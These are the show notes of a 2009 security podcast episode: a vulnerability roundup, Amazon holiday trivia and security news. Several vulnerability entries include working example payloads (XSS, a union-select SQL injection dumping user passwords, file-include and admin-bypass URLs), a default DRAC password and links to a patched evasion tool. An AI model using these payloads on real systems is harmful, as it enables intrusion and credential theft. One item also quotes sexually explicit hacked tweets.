InfoSec Podcast Episode 36 for December 29, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.
Goto www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.
Community SANS Atlanta 2010 Spring Schedule has been posted.
SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10
Go online to register by going to http://www.sans.org or call (301) 654-SANS(7267).
Vulnerabilities of Interest:
- APC Switched Rack Power Distribution Units (PDU) is subject to a cross-site scripting vulnerability because the device’s web interface fails to properly sanitize user-supplied input. This may be leveraged to execute script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. APC Switched Rack PDU AP7932 is vulnerable; other version may also be affected.Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Example URL is available:http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
- The Kleinanzeigenmarkt plugin for Woltlab Burning Board is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could result in a compromise of the application, accessing or modifying data, or exploiting the underlying database. All it takes is a browser to exploit this issue. Exploit code is available in the wild.
- Pragyan CMS is subject to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This could result in compromising the application as well as the potentially the complete system. Pragyan CMS 2.6.4 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URLs: http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil] and http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil].
- Jax Guestbook is subject to an authentication-bypass vulnerability which could allow an attacker to gain administrative access to the affected script and/or make configuration changes. This could potentially lead to further attacks. Jax Guestbook 3.50 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URL: http://www.example.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0
- MyBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which may be leveraged to execute script code in the browser of a user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and to launch additional attacks. MyBB 1.4.10 is vulnerable; other versions may be affected as well. Exploiting this issue requires enticing an user to follow a malicious URL Example URLs are available: http://www.example.com/myps.php?action=donate&username=”/> and http://www.example.com/myps.php?action=donate&username=<IMG”"”>”> .
- The Automated Logout module for Drupal is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. This may be leveraged to execute script code in the browser of a user in the context of the affected site. Automated Logout 6.x-1.6, 6.x-2.2 and prior versions are vulnerable.
- Wireshark is subject to multiple denial-of-service vulnerabilities and a buffer-overflow vulnerability which may allow an attacker to crash the application and deny service to legitimate users. Additionally, there is the possibility that these vulnerabilities could result in the execution of code in the context of users running the application. These issues affect Wireshark 0.9.0 through 1.2.4. Proof-of-concept capture files for the denial-of-service issues are available from the following locations: https://bugs.wireshark.org/bugzilla/attachment.cgi?id=4055 and http://www.wireshark.org/download/automated/captures/fuzz-2009-12-07-11141.pcap.
- The ‘com_schools’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data in the underlying database. Example URL code is available: http://www.example.com/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users–
- Microsoft IIS is prone to a security-bypass vulnerability that may result in IIS interpreting unexpected files as CGI applications. Attackers may be able to exploit this vulnerability to bypass intended security restrictions. Reports indicate that IIS 7.5 is not vulnerable to this issue; furthermore, it is currently unknown if IIS 7.0 is vulnerable.
Amazon.com on Saturday released its annual post-Christmas statement on holiday sales and made one thing clear: the Kindle was king. Amazon.com 2009 Holiday Facts (www.amazon.com only):
- Amazon customers purchased enough fruit cake to equal the weight of a 1967 Volkswagen Bug.
- Amazon customers bought enough gingerbread house kits that if stacked on top of each other would be as tall as the Sears Tower.
- If all the computers customers purchased this holiday were stacked one on top of the other, they would be more than twice as high as Mt. Everest.
- Amazon customers bought over 50 times more Light Therapy devices this holiday season than there are sunny days in Seattle the entire year.
- For the holiday time period alone, Amazon customers purchased enough shoot-and-share camcorders to supply 50 years’ worth of non-stop YouTube watching.
- Amazon customers bought enough Levi’s jeans to clothe everyone at the opening ceremony of the 2010 Olympics in Vancouver.
- Amazon customers purchased so many Blu-ray disc players that if you lined them up side to side, they would stretch for more than 27 miles.
- During the 2009 holiday season, Amazon customers bought enough 8 GB iPod touches to play 442 years of continuous music.
- In 2009, Amazon customers purchased enough heart rate monitor watches to put one on the wrist of everyone who finished the New York City marathons in 2008 and 2009.
- Amazon customers purchased enough Frustration-Free Package items to eliminate over 32,000 pounds of frustrating plastic materials, such as plastic clamshells.
- The last One-Day Prime order that was delivered in time for Christmas, was placed on Dec. 23 at 9:17 p.m. Pacific and shipped to Boca Raton, Florida for delivery on Dec. 24. The item was a pair of Yellow Gold 8-8.5mm Freshwater Cultured Pearl Stud Earrings.
- The last Local Express Delivery order that was delivered in time for Christmas, was placed by a Prime member and went to Seattle. It was a Kindle that was ordered at 1:43 p.m. on Christmas Eve and delivered at 4:57 p.m. that evening.
Amazon.com’s Hot Holiday Bestsellers (Nov. 15 through Dec. 19, based on units ordered):
- Electronics: Kindle Wireless Reading Device; Apple iPod touch 8 GB; and Garmin nuvi 260W 4.3-inch GPS
- Toys: Scrabble Slam Cards; The Settlers of Catan; and Scene It? Twilight Deluxe Edition
- Video Games and Hardware: Wii Fit Plus with Balance Board; New Super Mario Bros; and Call of Duty: Modern Warfare 2
News item 2: http://seclists.org/fulldisclosure/2009/Dec/438
As discussed last week, it appears that DECAF was disabled the authors at decafme.org. Well, it looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone home functionality. The files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ. Of the sites listed on the multiupload.com site, I had problems with both RapidShare and MegaUpload. The other sites seemed to work well.
News item 3: http://ontheflix.com/2009/12/25/celtics-ray-allen-twitter-account-gets-hacked-sends-naughty-tweets/
It seems that Celtics shooting guard Ray Allen’s Twitter account was hacked & apparently was sending some pretty naughty tweets. The Huffington Post is reporting that tweets such as: “I’m getting there. When you masturbate think about my tongue or your cl*t and switching back and forth from my d**k to my tongue.”
The tweets got deleted later on,and 14 minutes later, another tweet showed up stating an apology,and claiming he was not responsible. It read like this: “I’m sorry my acct was hacked into. I need to changey tweet handle.” Then he changed his Twitter name from @sugarray20 to @greenrayn20. Ray Allen said he may have to get off “Twitter” if this continues to happen. He tweeted, “i hope that it was amusing to people but im either gonna change my password or stop tweeting altogether.”
News item 4: http://www.wired.com/dangerroom/2009/12/not-just-drones-militants-can-snoop-on-most-us-warplanes/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+wired%2Fpolitics+%28Wired%3A+Politics%29
Wired Magazine is reporting that militants tapping into drones’ video feeds was just the start. Apparently, the U.S. military’s system for bringing overhead surveillance down to soldiers and Marines on the ground is also vulnerable to electronic interception. That means militants have the ability to see the video feeds from traditional fighters and bombers to unmanned spy planes. The problem is in the process of being addressed. But for now, an enormous security breach is even larger than previously thought.
So what is to blame? Apparently, the feeling is that early on units were “fielded so fast that it was done with an unencrypted signal. It could be both intercepted (e.g. hacked into) and jammed”. The question is why is it taking 10 years to fix the issue? You’ve got satellite providers in the L, C, S, Ku [satellite] bands that are sending data encrypted. So it’s not like this is new technology. What’s the big deal? Well, imagine trying to ensure that all units in a theater have the correct encryption/decryption keys necessary receive the data they need. This is really where the issue is. Do you trust the small units with these keys? How do you handle key rotation?
News item 5: http://blog.tenablesecurity.com/2009/12/top-10-nessus-plugins-for-2009.html
In 2009, Tenable released over 8,100 new plugins (and the year isn’t over yet!). These plugins have covered several different types of vulnerabilities, including web applications, embedded systems, local checks for operating systems and much more. Tenable polled it’s employees to find some of our favorite plugins released this year,and compiled the following list:
- DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution – This vulnerability allows remote attackers to inject commands via a flaw in the HTTP management web application on embedded systems running DD-WRT.
- Windows Remote Registry Enable/Disable – For remote authenticated checks to run on Windows systems, the remote registry service needs to be enabled. While this may not be a service you wish to run on all your systems, this plugin solves that problem by temporarily enabling and then disabling the remote registry service when the scan has completed.
- PCI Test Requirements – Back in April of 2009, I wrote a blog posted titled, “PCI DSS Auditing Linux, Apache, PHP & MySQL with Nessus 4″.
- USB Drives Enumeration – In 2009, over 218 million records fell into the wrong hands due to some form of breach (According to a report generated by DataLossDB). Some of those data loss incidents can be attributed to removable media such as USB thumb drives.
- Malware Infected Host - This Nessus plugin will seek out and report on these types of HTTP servers.
- Dell Remote Access Controller Default Password (calvin) for ‘root’ Account
- Conficker Detection (uncredentialed check) – Conficker was one of the major malware releases in 2009. This Nessus plugin could detect it on remote systems without using credentials.
- Backported Security Patches (HTTP) - This plugins look at Linux distribution banners for common FTP, HTTP and SSH services that seem as if they have not been patched, but are in fact most likely to have been fixed.
- Microsoft Windows SMB Shares Access – This plugin that keeps on giving! A simple plugin, but one of the most likely to fire during an internal audit where Windows machines are found. The shared drives could contain nothing or they could contain the entire HR database.
- Enhanced Web Application Testing Plugins – Not a plugin per-se, but bunch of enhanced web app tests that didn’t exist with all the new options before ‘09.
News item 6: http://www.wafb.com/Global/story.asp?S=11661499
A story about a 21-year old being caught on camera is probably nothing new. Stealing a decoy cameras is probably a little odd. Having a land owner had set up the decoy cameras to capture the theft of his digital game surveillance cameras is even more odd. Believe it or not, Dustin Archibald of Denham Springs was caught on camera stealing a camera with a “No Trespassing” sign visible in the background.
Archibald claims that he was not stealing the camera, but rather taking it so the landowner would not be able to hunt deer in the area. Unfortunately, with the property owner’s photographic evidence from his surveillance cameras, Archibald was identified right away and he consequentially turned himself into authorities.
The take-away here is that you never know what is watching a device that watches.